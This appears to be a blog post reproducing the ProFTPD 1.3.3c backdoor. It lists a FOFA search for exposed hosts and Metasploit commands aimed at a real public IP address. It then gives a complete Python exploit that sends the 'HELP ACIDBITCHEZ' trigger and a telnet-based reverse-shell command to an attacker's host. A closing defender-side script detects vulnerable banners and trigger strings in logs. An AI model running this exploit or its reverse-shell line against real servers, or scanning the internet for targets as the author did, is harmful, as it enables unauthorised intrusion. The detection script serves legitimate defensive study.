ProFTPD-1.3.3c Backdoor Command Execution: vulnerability reproduction + PoC

https://www.whereisk0shl.top/post/proftpd-1.3.3chou-men-fen-xi

https://github.com/proftpd/proftpd
I looked around the official site and the official GitHub for the 1.3.3c release of proftpd; presumably it had too many vulnerabilities and the vendor took it down.

https://blog.csdn.net/morrino/article/details/115836400 This article provides a target machine running version 1.3.3c.

So I decided to search on FOFA:
app="proftpd" && banner="1.3.3c"
I found some hosts and tried exploiting them with msf; I tried quite a few, but none of them were vulnerable.

search ProFTPd-1.3.3c
use 0
show options
set rhosts 64.6.247.69
show payloads
set payload cmd/unix/reverse
show options
set lhost 192.168.18.137
exploit

[Image 1]

https://www.exploit-db.com/exploits/15662 Here I found the backdoored software.
[Image 2]
Installation guide: https://blog.csdn.net/feelinghappy/article/details/106817434

./configure --prefix=/usr/local/ftp && make && make install

#Create the FTP group and FTP user (user name, user group) and set a password
mkdir /opt/ftp_soft   #create the user's home directory
groupadd ftpgroup
useradd ftpadmin -g ftpgroup -d /opt/ftp_soft -s /sbin/nologin  #create the user and assign the home directory
passwd ftpadmin
chown ftpadmin:ftpgroup /opt/ftp_soft -R     #set owner:group, otherwise even a successful install has no permissions


make && make install


#Edit the configuration file
vim /usr/local/ftp/etc/proftpd.conf
#Change
User    ftpadmin
Group  ftpgroup
DefaultRoot  /opt/ftp_soft
#Add
PassivePorts 11100 11111  #passive-mode port range (data transfers)
DefaultAddress     192.168.18.137

#Start
/usr/local/ftp/sbin/proftpd

[Image 3]
Finally, the reproduction succeeded.

#!/usr/bin/python
#coding:utf-8
#author:k0shl
import socket
import os

def exp_socket(RHOST,s):
    try:
        s.connect((RHOST,21))
        str = s.recv(1024)
        print str
        return str
    except Exception,e:
        print e
        return 0

def exploit(RHOST,s,cmd):
    try:
        s.send('HELP ACIDBITCHEZ\r\n')
        s.send(cmd)
        print "[+]Exploit send ok!"
    except Exception,e:
        print e
if __name__ == '__main__':
    try:
        print "攻击前请使用nc绑定端口,等待shell连接"
        LHOST = raw_input("input shell ip:")
        LPORT = raw_input("input shell port:")
        RHOST = raw_input("input target ip:")
        #LHOST = '172.16.39.141'
        #LPORT = '4444'
        #RHOST = '172.16.39.137'
        print '[+]start connect to %s'%RHOST
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        socket_result = exp_socket(RHOST,s)
        if socket_result != 0:
            if '220' in socket_result:
                print '[+]Try to Exploit'
                cmd = "nohup /bin/bash -c '(sleep 4184|telnet "+ LHOST + " " + LPORT +"|while : ; do sh && break; done 2>&1|telnet "+LHOST + " "+LPORT+">/dev/null 2>&1 &)' >/dev/null 2>&1\n"
                exploit(RHOST,s,cmd)
                s.close()
            else:
                print '[-]no vul!'
                s.close()
        else:
            print '[-]connect to ip error!'
            s.close()
    except Exception,e:
        s.close()
        print e

[Image 4]
I am still thinking about how to verify the vulnerability's presence more directly, instead of via a reverse shell.
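As a defender-side answer to the question above, here is an added example (not from the original post or from ProFTPD) that parses the server's 220 greeting to inventory 1.3.3c builds and scans FTP command-log lines for the trigger string the PoC sends. The greetings and log lines are constructed, and the log layout is an assumption.

```python
import re

# Trigger string the trojaned 1.3.3c build reacts to (sent by the PoC above).
BACKDOOR_TRIGGER = "HELP ACIDBITCHEZ"
# Release discussed on this page.
BACKDOORED_VERSION = "1.3.3c"

# Stock greeting: "220 ProFTPD <version> Server (<ServerName>) [<address>]".
BANNER_RE = re.compile(r"^220[ -].*?ProFTPD\s+(\S+)\s+Server", re.IGNORECASE)


def parse_banner(greeting):
    """Return the ProFTPD version announced in a 220 greeting, or None."""
    m = BANNER_RE.match(greeting.strip())
    return m.group(1) if m else None


def is_backdoored_version(greeting):
    """True when the greeting announces the trojaned 1.3.3c release."""
    return parse_banner(greeting) == BACKDOORED_VERSION


def find_trigger(lines):
    """Return 1-based numbers of log lines carrying the backdoor trigger.

    Matching is case-insensitive and whitespace-normalised, so a padded or
    re-cased trigger is still caught while ordinary HELP requests are not.
    """
    needle = " ".join(BACKDOOR_TRIGGER.lower().split())
    return [n for n, line in enumerate(lines, 1)
            if needle in " ".join(line.lower().split())]


# Constructed samples, not captured from a real server or log file.
SAMPLE_GREETINGS = [
    "220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [::ffff:192.0.2.10]",
    "220 ProFTPD 1.3.3e Server (Patched box) [192.0.2.11]",
    "220 (vsFTPd 3.0.3)",
]
SAMPLE_LOG = [  # assumed "<client> <timestamp> <command>" layout
    "192.0.2.50 [01/Jan/2024:10:00:01 +0000] USER anonymous",
    "192.0.2.50 [01/Jan/2024:10:00:02 +0000] HELP",
    "192.0.2.51 [01/Jan/2024:10:00:03 +0000] help   acidbitchez",
    "192.0.2.51 [01/Jan/2024:10:00:04 +0000] HELP SITE",
]

if __name__ == "__main__":
    for g in SAMPLE_GREETINGS:
        print(f"{g!r}: version={parse_banner(g)} backdoored={is_backdoored_version(g)}")
    print("trigger on log lines:", find_trigger(SAMPLE_LOG))  # [3]
```

The ServerIdent directive can hide or replace the greeting, so a banner with no version is inconclusive and the installed package version on the host remains the authoritative check.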
